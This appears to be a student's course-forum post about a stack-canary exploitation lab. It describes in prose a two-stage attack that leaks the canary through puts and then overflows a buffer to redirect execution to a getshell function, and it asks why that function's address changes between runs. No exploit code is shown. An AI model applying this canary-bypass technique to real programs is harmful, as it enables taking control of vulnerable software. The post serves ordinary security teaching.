Hi all-
I went through the stack cookie module last night. I compiled the binary on a 64-bit system:
gcc -m32 --no-pie canary.c -o canary
I went through the slides and created the pwntools
python file to run the multistage exploit:
1 - first buffer write leads to a leak of the stack canary (since the 0x00 byte becomes 0xa from the newline and puts
goes until it encounters a 0x00 byte) without overflowing the buffer
2- the second buffer write overflows while writing the correct stack canary to the correct place in the buffer and overwrites what will become EIP with a hardcoded return address
In the slides the hardcoded return address is for the dead function getshell
obtained either through info functions
or p getshell
but when I run the exploit the prompt segfaults at the end. I determined that this is because the return address is wrong. Upon further inspection the address for getshell
is different each time I run it in gdb
.
This exercise is supposed to have the system ASLR enabled and it’s not supposed to matter. Why is the address for getshell
changing?
Thanks,
Steve